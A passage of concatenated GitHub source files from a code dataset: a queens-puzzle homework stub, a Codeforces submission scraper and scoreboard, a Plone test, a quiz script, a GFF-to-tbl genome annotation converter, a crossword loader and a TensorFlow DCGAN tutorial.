print(board[i])\n\n# Takes in a board, returns 1 if two or more queens can attack each other. 
Else 0.\ndef collisionCheck(board):\n # This function is used in the horrizontal and diagonal detection to check if a list has two queens present. \n # Returns 1 if two or more, else 0 \n def listCheck(l):\n flag = 0\n for i in range(0,8):\n if(i == 1):\n flag = flag + 1\n if(flag >=2):\n return 1\n return 0\n\n # Check horizontal collision \n for i in range(0,8):\n flag = 0\n for j in range (0,8):\n if(board[i][j]==1):\n flag = flag + 1\n if(flag >= 2):\n return \"horizontal Nah\"\n # Check vertical collision \n for i in range(0,8):\n flag = 0\n for j in range (0,8):\n if(board[j][i]==1):\n flag = flag + 1\n if(flag >= 2):\n return \"vertical Nah\"\n # Check diagonal left collision (down and right)\n col = 7\n row = 0 \n \n\n\n\n # Check diagonal right collision (up and right)\n\n \n\n\n\n return \"Gucci\" \nz = fill()\n\nfor i in range(1,6):\n print(i)\n# print(collisionCheck(z))\n\n\n\n\n# Places the queens and calls collisionCheck to see if you can place a certain queen there.\n\n\n","repo_name":"zacharyrobin/csci169","sub_path":"hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44815142574","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom collections import defaultdict\nfrom threading import Thread,RLock\nimport sqlite3 as sq3\nimport time\nfrom datetime import datetime, timedelta\n\n\n# AW = Accepted Wrong\ndef q_generator( handle,aw,rating,point,query_list,question,date_time ):\n\tq = \"insert into aw(name,aw,rating,point,question_txt,question_link,date_time) values('{}',{},{},{},'{}','{}','{}');\".format(handle,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\taw,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trating,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpoint,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tquestion.text.strip().strip(\"\\n\").replace(\"'\",\"\"),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tquestion['href'].strip(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tdate_time )\n\t\n\tquery_list.append( q )\n\n\ndef func_points(handle,rating,data,AW,query_list,question,date_time):\n\n\tif AW:\n\t\taw=1\n\telse:\n\t\taw=0\n\n\tif data[handle][\"star\"] == 4:\n\t\tif rating < 1100:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\t\n\t\t\t\tq_generator( handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 1400:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-1100)/100)*10+50\n\t\t\t\tq_generator( handle,aw,rating, ((rating-1100)/100)*10+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-1100)/100)*10+50)//5\n\t\t\t\tq_generator( handle,aw,rating, -(((rating-1100)/100)*10+50)//5,query_list,question,date_time )\n\n\n\tif data[handle][\"star\"] == 3:\n\t\tif rating < 1000:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\n\t\t\t\tq_generator( 
handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 1200:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-1000)/100)*25+50\n\t\t\t\tq_generator( handle,aw,rating,((rating-1000)/100)*25+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-1000)/100)*25+50)//5\n\t\t\t\tq_generator( handle,aw,rating,-(((rating-1000)/100)*25+50)//5,query_list,question,date_time )\n\n\n\tif data[handle][\"star\"] == 2:\n\t\tif rating < 900:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\n\t\t\t\tq_generator( handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 1100:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-900)/100)*25+50\n\t\t\t\tq_generator( handle,aw,rating,((rating-900)/100)*25+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-900)/100)*25+50)//5\n\t\t\t\tq_generator( handle,aw,rating,-(((rating-900)/100)*25+50)//5,query_list,question,date_time )\n\n\n\tif data[handle][\"star\"] == 1:\n\t\tif rating < 700:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\n\t\t\t\tq_generator( handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 900:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-700)/100)*25+50\n\t\t\t\tq_generator( handle,aw,rating,((rating-700)/100)*25+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-700)/100)*25+50)//5\n\t\t\t\tq_generator( handle,aw,rating,-(((rating-700)/100)*25+50)//5,query_list,question,date_time )\n\n\n\treturn data[handle][\"points\"]\t\n\n\ndef fetch_rating(link):\n\n\tr = requests.get(link)\n\tsoup = BeautifulSoup(r.text,\"html.parser\")\n\ttry:\n\t\trating = int(soup.find(\"span\",{\"class\":\"tag-box\",\"title\":\"Difficulty\"}).text.strip().strip(\"*\"))\n\texcept:\n\t\trating = -1\n\treturn rating\n\ndef get_questions( handle, page,data,pointer_initiated ):\n\tlink = \"https://codeforces.com/submissions/{}/page/{}\".format(handle,page)\n\tr = requests.get(link)\n\tsoup = BeautifulSoup(r.text,\"html.parser\")\n\ttable = soup.find_all(\"table\",{\"class\":[\"status-frame-datatable\"]})[0]\n\ttrs = table.find_all(\"tr\")[1:]\n\n\tc = 0\n\tw = 0\n\tsubmission = []\n\tbr=0\n\tfor i in trs:\n\t\tpoint = i.find_all(\"td\")[0].text.strip()\n\t\tquestion = i.find_all(\"td\")[3].find(\"a\")\n\t\tdate_time = 
i.find_all(\"td\")[1].text.strip().strip(\"\\n\")\n\t\tdate_time = (datetime.strptime( date_time,\"%b/%d/%Y %H:%M\" )+timedelta(hours=2,minutes=30)).strftime(\"%b/%d/%Y %H:%M\")\n\n\n\t\tprint( point,date_time, datetime.strptime( date_time, \"%b/%d/%Y %H:%M\" ) > datetime.strptime( \"2020-03-20 00:00\", \"%Y-%m-%d %H:%M\" ) )\n\n\t\tif data[handle]['pointer']==point or datetime.strptime( date_time, \"%b/%d/%Y %H:%M\" ) < datetime.strptime( \"2020-03-16 00:00\", \"%Y-%m-%d %H:%M\" ):\n\t\t\tbr=1\n\t\t\tbreak\n\n\t\t# print( i )\n\t\t# print( i.find_all(\"td\")[5].find_all(\"span\") )\n\t\ttry:\n\t\t\tif datetime.strptime( date_time, \"%b/%d/%Y %H:%M\" ) <= datetime.strptime( \"2020-03-20 00:00\", \"%Y-%m-%d %H:%M\" ): \n\t\t\t\tif i.find_all(\"td\")[5].text.find(\"Running\")==-1 and i.find_all(\"td\")[5].text.find(\"queue\")==-1:\n\n\t\t\t\t\tif not pointer_initiated[0]:\n\t\t\t\t\t\tdata[handle]['pointer']=point\n\t\t\t\t\t\tprint(\"pointer Initiated with value {}\".format(point))\n\t\t\t\t\t\tpointer_initiated[0]=True\n\n\t\t\t\t\tverdict = i.find_all(\"td\")[5].find_all(\"span\")[1].text\n\t\t\t\t\tif verdict == \"Accepted\":\n\t\t\t\t\t\tc = c + 1\n\t\t\t\t\t\tlink = \"https://codeforces.com\"+i.find_all(\"td\")[3].a['href']\n\t\t\t\t\t\trating = fetch_rating(link)\n\t\t\t\t\t\tif rating!=-1:\n\t\t\t\t\t\t\tsubmission.append( (rating,question,True,date_time) )\n\t\t\t\t\telse:\n\t\t\t\t\t\tw = w + 1\n\t\t\t\t\t\tlink = \"https://codeforces.com\"+i.find_all(\"td\")[3].a['href']\n\t\t\t\t\t\trating = fetch_rating(link)\n\t\t\t\t\t\tif rating!=-1:\n\t\t\t\t\t\t\tsubmission.append( (rating,question,False,date_time) )\n\t\t\t\telse:\n\t\t\t\t\tprint(\"This Question is in queue or running\")\n\t\t\telse:\n\t\t\t\tprint(\"Date time exeded for this question\")\n\t\texcept:\n\t\t\tpass\n\t\t\n\treturn [ [c,w,submission], br ]\n\n\n# def start_pointer( handle ):\n# \tlink = \"https://codeforces.com/submissions/{}/page/1\".format(handle)\n# \tr = requests.get(link)\n# \tsoup = BeautifulSoup(r.text,\"html.parser\")\n# \ttable = soup.find_all(\"table\",{\"class\":[\"status-frame-datatable\"]})[0]\n# \ttrs = table.find_all(\"tr\")[1:]\n# \tfp = trs[0].find_all(\"td\")[0].text.strip().strip(\"\\n\")\n# \treturn fp\n\ndef page_traversal(handle,data,query_list):\n\n\tc,w,submission=0,0,[]\n\tpage=1\n\tpointer_initiated = [ False ]\n\n\twhile(1):\n\t\tresult = get_questions( handle,page,data,pointer_initiated )\n\t\tl=result[0]\n\t\tc+=l[0]\n\t\tw+=l[1]\n\t\tsubmission+=l[2]\n\t\t\t\n\t\tif result[1]==1:\n\t\t\tbreak\n\n\t\tpage+=1\n\n\tfor i in submission:\n\t\tfunc_points(handle,i[0],data,i[2],query_list,i[1],i[3])\n\n\tdata[handle]['accepted'] += c\n\tdata[handle]['wrong'] += w\n\n\tprint( \"{} Accepted:{}, Wrong:{}, Points:{}\\n\".format( handle, c,w, data[handle]['points'] ) )\n\ndef update_point( handle,data,query_list,lock ):\n\n\tdata1 = dict(data)\n\tquery_list1 = list( query_list )\n\t\n\tpage_traversal(handle,data1,query_list1)\n\n\tlock.acquire()\n\tprint(\"lock Acquired\")\n\n\tdata = dict (data1)\n\tquery_list += list( query_list1 )\n\tprint( query_list )\n\tlock.release()\n\tprint(\"Lock Released\")\n\n\ndef score_count( handles ):\n\tdb = sq3.connect(\"score.db\")\n\tc = db.cursor()\n\tq=\"select star,name,points,pointer,accepted,wrong from score;\"\n\tc.execute(q)\n\td = c.fetchall()\n\tdata = defaultdict(dict)\n\tdata = { i[1]:{'star':i[0],'points':i[2],'pointer':i[3],'accepted':i[4],'wrong':i[5]} for i in d }\n\tquery_list = []\n\tlock = RLock()\n\n\n\tthreads=[]\n\n\tfor handle in 
handles:\n\t\t\n\t\ti = Thread( target=update_point,args=(handle,data,query_list,lock) )\n\t\ti.start()\n\t\tthreads.append( i )\n\t\t# update_point(handle,data,query_list,lock)\n\n\tfor i in threads:\n\t\tprint(\"Thread is joining\")\n\t\ti.join()\n\n\tfor i in data:\n\t\tq1=\"update score set points={},pointer='{}',accepted={},wrong={} where name='{}'\".format(data[i]['points'],data[i]['pointer'],data[i]['accepted'],data[i]['wrong'],i)\n\t\tc.execute(q1)\n\n\tfor i in query_list:\n\t\tprint(i)\t\n\t\tc.execute(i)\n\n\tdb.commit()\n\tdb.close()\n\n\n\t\n","repo_name":"chiragsoni81245/scoreboard","sub_path":"app/utility_function.py","file_name":"utility_function.py","file_ext":"py","file_size_in_byte":8716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"1287130914","text":"from plone import api\nfrom plone.dexterity.content import Container\n\nfrom seantis.plonetools import tests\nfrom seantis.plonetools.behaviors.customtitle import on_object_modified\n\n\nclass CustomTitleContainer(Container):\n\n def get_custom_title(self):\n return self.custom_title\n\n\nclass TestBehaviors(tests.IntegrationTestCase):\n\n def test_custom_title_behavior(self):\n\n behavior = 'seantis.plonetools.behaviors.customtitle.ICustomTitle'\n klass = 'seantis.plonetools.tests.test_behaviors.CustomTitleContainer'\n\n portal_type = self.new_temporary_type(\n behaviors=[behavior], klass=klass\n ).id\n\n with self.user('admin'):\n obj = api.content.create(\n id='',\n type=portal_type,\n container=self.new_temporary_folder(),\n custom_title=u'My custom title'\n )\n\n self.assertEqual(obj.id, 'my-custom-title')\n self.assertEqual(obj.title, u'My custom title')\n\n obj.custom_title = u'Another swell title'\n on_object_modified(obj)\n\n # the id does not change after initial creation\n self.assertEqual(obj.id, 'my-custom-title')\n self.assertEqual(obj.title, u'Another swell title')\n","repo_name":"seantis/seantis.plonetools","sub_path":"seantis/plonetools/tests/test_behaviors.py","file_name":"test_behaviors.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27685090770","text":"print(\"Welcome to my country quiz!\")\r\n\r\nplaying = input(\"Do you want to play? \\n\")\r\nif playing.lower() != \"yes\":\r\n quit()\r\n\r\nprint(\"Ok, let's play! \")\r\nscore = 0\r\n\r\nanswer = input(\"What is the smallest country in the world? \\n\")\r\nif answer.lower() == \"vatican city\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Incorrect!\")\r\n\r\nanswer = input(\"What is the biggest country in the world? \\n\")\r\nif answer.lower() == \"russia\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Incorrect!\")\r\n\r\nanswer = input(\"How many countries have their capital city in Europe? \\n\")\r\nif answer.lower() == \"44\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Incorrect!\")\r\n\r\nanswer = input(\"Which continent is missing: Africa; North America; South America; Antarctica; Europe; Oceania? 
\\n\")\r\nif answer.lower() == \"asia\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Incorrect!\")\r\n\r\nprint(\"\\nYou got \" + str(score) + \"/4 questions\")\r\nprint(\"You got \" + str(score / 4 * 100) + \"%\")","repo_name":"VM302008/python-basics","sub_path":"quizGame.py","file_name":"quizGame.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30264257393","text":"#!/usr/bin/env python\nimport operator\nimport sys\n\nINCLUDE_FEATURE_TYPES = ('mRNA', 'miRNA', 'ncRNA', 'tRNA', 'rRNA', 'snRNA', 'snoRNA', 'CDS', 'exon')\n\n\ndef iterate_gff_body(filename):\n with open(filename, 'r') as handle:\n for line in handle:\n if line.startswith('###'):\n return\n if line.startswith('##'):\n continue\n seq_id, source, feature_type, start, end, score, strand, phase, attributes_str = line.rstrip().split('\\t')\n if feature_type not in INCLUDE_FEATURE_TYPES:\n continue\n attributes = dict()\n for element in attributes_str.split(';'):\n key, value = element.split('=')\n if key == 'Parent':\n attributes[key] = value.split(',')\n elif key == 'ID':\n attributes[key] = value\n elif key == 'Name':\n attributes[key] = value\n # Make intervals half-open and zero-based (in GFF they are closed intervals and 1-based) ...\n yield feature_type, seq_id, int(start) - 1, int(end), strand, attributes\n\n\nclass Entry:\n @staticmethod\n def from_mRNA(feature_id, chromosome, tx, strand, gene_id):\n entry = Entry(feature_id)\n entry.chromosome, entry.tx, entry.strand, entry.gene_id = chromosome, tx, strand, gene_id\n return entry\n\n def __init__(self, feature_id):\n self.feature_id, self.chromosome, self.tx, self.strand, self.CDSs, self.exons, self.gene_id = \\\n feature_id, '', (), '', [], [], ''\n\n def isempty(self):\n return len(self.tx) == 0\n\n def exon_count(self):\n return len(self.exons)\n\n def exon_starts(self):\n if self.exon_count() == 0:\n return tuple()\n return sorted(map(operator.itemgetter(0), self.exons))\n\n def exon_ends(self):\n if self.exon_count() == 0:\n return tuple()\n return sorted(map(operator.itemgetter(1), self.exons))\n\n def cds_span(self):\n if len(self.CDSs) == 0:\n return self.tx[1], self.tx[1]\n return min(map(operator.itemgetter(0), self.CDSs)), max(map(operator.itemgetter(1), self.CDSs))\n\n\ndef load_data(gff_filename):\n feature_id2entry = dict()\n for feature_type, chromosome, start, end, strand, attributes in iterate_gff_body(gff_filename):\n if feature_type.endswith('RNA'):\n # Analyze attributes ...\n if 'ID' not in attributes:\n print(\"'{0:s}' entry ({1:s} {2:d} {3:d} {4:s}) has no ID attribute.\".format(feature_type, chromosome,\n start, end, strand),\n file=sys.stderr)\n sys.exit(1)\n feature_id = attributes['ID']\n if 'Parent' in attributes and len(attributes['Parent']) == 1:\n gene_id = attributes['Parent'][0]\n elif 'Name' in attributes:\n gene_id = attributes['Name']\n else:\n print(\"'{0:s}' entry (ID: {1:s}) cannot be associated with a geneID.\".format(feature_type, feature_id),\n file=sys.stderr)\n sys.exit(1)\n\n if feature_id in feature_id2entry.keys():\n # if feature_id2entry[feature_id].chromosome != chromosome or feature_id2entry[feature_id].strand != strand:\n # print(\"'mRNA' entry not compatible with child entry.\", file=sys.stderr)\n # sys.exit(1)\n feature_id2entry[feature_id].chromosome = chromosome\n feature_id2entry[feature_id].tx = (start, end)\n feature_id2entry[feature_id].strand = strand\n feature_id2entry[feature_id].gene_id = 
gene_id\n else:\n feature_id2entry[feature_id] = Entry.from_mRNA(feature_id, chromosome, (start, end), strand, gene_id)\n elif feature_type == 'exon':\n if 'Parent' not in attributes:\n print(\"'exon' entry (ID: {0:s}) has no Parent attribute.\".format(feature_id), file=sys.stderr)\n sys.exit(1)\n exon = (start, end)\n for parent_id in attributes['Parent']:\n if parent_id not in feature_id2entry.keys():\n feature_id2entry[parent_id] = Entry(parent_id)\n # elif feature_id2entry[parent_id].chromosome != chromosome or feature_id2entry[parent_id].strand != strand:\n # print(\"'exon' entry not compatible with parent 'mRNA' entry {0:s}.\".format(parent_id),\n # file=sys.stderr)\n # sys.exit(1)\n feature_id2entry[parent_id].exons.append(exon)\n # feature_id2entry[parent_id].chromosome = chromosome\n # feature_id2entry[parent_id].strand = strand\n elif feature_type == 'CDS':\n if 'Parent' not in attributes:\n print(\"'CDS' entry (ID: {0:s}) has no Parent attribute.\".format(feature_id), file=sys.stderr)\n sys.exit(1)\n CDS = (start, end)\n for parent_id in attributes['Parent']:\n if parent_id not in feature_id2entry.keys():\n feature_id2entry[parent_id] = Entry(parent_id)\n # elif feature_id2entry[parent_id].chromosome != chromosome or feature_id2entry[parent_id].strand != strand:\n # print(\"'CDS' entry not compatible with parent 'mRNA' entry {0:s}.\".format(parent_id),\n # file=sys.stderr)\n # sys.exit(1)\n feature_id2entry[parent_id].CDSs.append(CDS)\n # feature_id2entry[parent_id].chromosome = chromosome\n # feature_id2entry[parent_id].strand = strand\n return feature_id2entry\n\n\ndef main():\n if len(sys.argv) != 2:\n print('Wrong number of input arguments.', file=sys.stderr)\n sys.exit(2)\n gff_filename = sys.argv[1]\n print('Loading GFF into memory ...', file=sys.stderr)\n feature_id2entry = load_data(gff_filename)\n print('Conversion to tbl format ...', file=sys.stderr)\n print('#bin', 'name', 'chrom', 'strand', 'txStart', 'txEnd', 'cdsStart', 'cdsEnd', 'exonCount',\n 'exonStarts', 'exonEnds', 'score', 'name2', 'cdsStartStat', 'cdsEndStat', 'exonFrames',\n sep='\\t')\n\n for feature_id, entry in feature_id2entry.items():\n if entry.isempty():\n print('{0:s} is an empty entry.'.format(feature_id), file=sys.stderr)\n continue\n if entry.exon_count() == 0:\n entry.exons.append(entry.tx)\n cds = entry.cds_span()\n exon_starts = ','.join(map(str, entry.exon_starts())) + ','\n exon_ends = ','.join(map(str, entry.exon_ends())) + ','\n print('NA', feature_id, entry.chromosome, entry.strand, entry.tx[0], entry.tx[1], cds[0], cds[1],\n entry.exon_count(), exon_starts, exon_ends, 'NA', entry.gene_id, 'NA', 'NA', 'NA',\n sep='\\t')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aertslab/regulatory_regions_delineation","sub_path":"gff2tbl.py","file_name":"gff2tbl.py","file_ext":"py","file_size_in_byte":7077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71581969386","text":"# -*- coding: utf-8 -*-\n\"\"\"Variety is a Python library for working with cryptic crosswords.\"\"\"\nimport os\n\nfrom cryptic import from_hex\nfrom hex import read as read_hex\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n # filename = \"puzzles/wsj020.yaml\"\n # filenames = [filename]\n\n skip = [\n \"puzzles/atl005.yaml\",\n ]\n\n filenames = []\n for file in os.listdir(\"puzzles\"):\n if file.endswith(\".yaml\"):\n filenames.append(os.path.join(\"puzzles\", file))\n\n for filename in sorted(filenames):\n if filename in skip:\n continue\n print(f\"# 
{filename}\")\n hex_dict = read_hex(filename)\n puzzle = from_hex(hex_dict)\n print(puzzle)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lukwam/variety","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5424404645","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhttps://www.tensorflow.org/tutorials/generative/dcgan\nCreated on Sun Jun 7 13:40:07 2020\n\n@author: Chris\n\"\"\"\n\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Reshape, Dropout, Dense \nfrom tensorflow.keras.layers import Flatten, BatchNormalization\nfrom tensorflow.keras.layers import Activation, ZeroPadding2D\nfrom tensorflow.keras.layers import LeakyReLU\nfrom tensorflow.keras.layers import UpSampling2D, Conv2D, AveragePooling2D, Dense, Conv2DTranspose\nfrom tensorflow.keras.models import Sequential, Model, load_model\nfrom tensorflow.keras.optimizers import Adam\nimport glob\nimport imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport PIL\nimport time\n\nfrom IPython import display\n\n#Fashion mnist Alternative dataset\n(train_images, train_labels), (_, _) = tf.keras.datasets.fashion_mnist.load_data()\n\n\n#PreProcessing Data\n# (train_images, train_labels), (_, _) = tf.keras.datasets.mnist.load_data()\ntrain_images = train_images.reshape(train_images.shape[0], 28, 28, 1).astype('float32')\ntrain_images = (train_images - 127.5) / 127.5 # Normalize the images to [-1, 1]\n\nBUFFER_SIZE = 60000\nBATCH_SIZE = 256\n# Batch and shuffle the data\ntrain_dataset = tf.data.Dataset.from_tensor_slices(train_images).shuffle(BUFFER_SIZE).batch(BATCH_SIZE)\n\nEPOCHS = 200\nnoise_dim = 100\nnum_examples_to_generate = 16\nseed = tf.random.normal([num_examples_to_generate, noise_dim])\n\n \ndef build_discriminator(image_shape):\n\n model = tf.keras.Sequential()\n model.add(Conv2D(64, (5, 5), strides=(2, 2), padding='same',\n input_shape=[28, 28, 1]))\n model.add(LeakyReLU())\n model.add(Dropout(0.3))\n\n model.add(Conv2D(128, (5, 5), strides=(2, 2), padding='same'))\n model.add(LeakyReLU())\n model.add(Dropout(0.3))\n\n model.add(Flatten())\n model.add(Dense(1))\n \n # model= Sequential(name=\"discriminator\")\n # model.add(Conv2D(28, kernel_size=2, strides=1, input_shape=image_shape,padding=\"same\"))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Activation(\"relu\"))\n # model.add(AveragePooling2D(pool_size=(2,2), strides=(1,1),padding=\"SAME\"))\n \n # model.add(Conv2D(64, kernel_size=1, strides=1, input_shape=image_shape,padding=\"same\"))\n # model.add(LeakyReLU(alpha=0.2))\n # model.add(Activation(\"relu\"))\n # model.add(AveragePooling2D(pool_size=(2,2), strides=(1,1),padding=\"SAME\"))\n \n # model.add(Flatten())\n # model.add(Dense(7*7*64))\n # model.add(Activation(\"relu\"))\n # model.add(Dense(1))\n # model.add(Activation(\"sigmoid\"))\n\n # model.summary()\n return model\n\n\n\ndef build_generator(z_dim):\n model = Sequential(name=\"Generator\")\n model.add(Dense(7*7*256, use_bias=False, input_shape=(z_dim,)))\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Reshape((7, 7, 256)))\n assert model.output_shape == (None, 7, 7, 256) # Note: None is the batch size\n\n model.add(Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False))\n assert model.output_shape == (None, 7, 7, 128)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(64, (5, 5), 
strides=(2, 2), padding='same', use_bias=False))\n assert model.output_shape == (None, 14, 14, 64)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(1, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='tanh'))\n assert model.output_shape == (None, 28, 28, 1)\n \n # model.summary()\n \n return model\n\n#Initialising Generator \nz_dim=100\ngenerator = build_generator(z_dim)\n\n#Test Generator Function\nnoise = tf.random.normal([1, 100])\ngenerated_image = generator(noise, training=False)\nplt.imshow(generated_image[0, :, :, 0], cmap='gray')\n\n#Initialise Discriminator\nimage_shape=[28,28,1]\ndiscriminator = build_discriminator(image_shape)\n\n#Test Discriminator\ndecision = discriminator(generated_image)\nprint (decision)\n\n \n#################################################\n#Loss\n################################################\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\ndef discriminator_loss(real_output, fake_output):\n real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)\n total_loss = real_loss + fake_loss\n return total_loss\n\ndef generator_loss(fake_output): #Predict that the fake outputs are real\n return cross_entropy(tf.ones_like(fake_output), fake_output)\n\n#Define optimisers\ngenerator_optimizer = tf.keras.optimizers.Adam(1e-4)\ndiscriminator_optimizer = tf.keras.optimizers.Adam(1e-4)\n\n\n\n\n###################################################################################\n#Utility code\n###################################################################################\n\ncheckpoint_dir = './training_checkpoints'\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\ncheckpoint = tf.train.Checkpoint(generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n generator=generator,\n discriminator=discriminator)\n\ndef generate_and_save_images(model, epoch, test_input):\n # Notice `training` is set to False.\n # This is so all layers run in inference mode (batchnorm).\n predictions = model(test_input, training=False) #Test Model\n\n #Plot model \n fig = plt.figure(figsize=(4,4)) \n\n for i in range(predictions.shape[0]):\n plt.subplot(4, 4, i+1)\n plt.imshow(predictions[i, :, :, 0] * 127.5 + 127.5, cmap='gray')\n plt.axis('off')\n\n plt.savefig('image_at_epoch_{:04d}.png'.format(epoch))\n plt.show()\n\n\n################################################\n#Training\n###############################################\n\n\n#`tf.function` - Compiles a function into a callable TensorFlow graph \n@tf.function\ndef train_step(images):\n noise = tf.random.normal([BATCH_SIZE, noise_dim])\n \n #tf.GradientTape - Records operations for automatic differentiation \n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n generated_images = generator(noise, training=True) #Generate Image\n\n real_output = discriminator(images, training=True) #Discriminate real output \n fake_output = discriminator(generated_images, training=True) #Discriminate fake output\n\n gen_loss = generator_loss(fake_output) #Ability to fake out the discriminator max -log(D(G(z)))\n disc_loss = discriminator_loss(real_output, fake_output) #Ability to identify fake and truth \n\n #Differentiate w.r.t. trainable variables\n gradients_of_generator = gen_tape.gradient(gen_loss, generator.trainable_variables) \n gradients_of_discriminator = disc_tape.gradient(disc_loss, discriminator.trainable_variables)\n \n #Apply 
optimiser \"apply_gradient class\" on the zip-ed gradient trainable variable pairs\"\n generator_optimizer.apply_gradients(zip(gradients_of_generator, generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, discriminator.trainable_variables))\n return (gen_loss,disc_loss)\n \ndef train(dataset, epochs):\n \n#Train per epoch \n for epoch in range(epochs):\n start = time.time()\n \n #Mini-batch training \n for image_batch in dataset:\n gLoss,dLoss=train_step(image_batch)\n \n print (\"Generator Loss: %f, Discriminator Loss %f\"%(gLoss,dLoss))\n\n # Produce images for the GIF as we go\n display.clear_output(wait=True)\n generate_and_save_images(generator,epoch + 1,seed)\n\n # Save the model every 15 epochs\n if (epoch + 1) % 15 == 0:\n checkpoint.save(file_prefix = checkpoint_prefix)\n\n print ('Time for epoch {} is {} sec'.format(epoch + 1, time.time()-start))\n\n # Generate after the final epoch\n display.clear_output(wait=True)\n 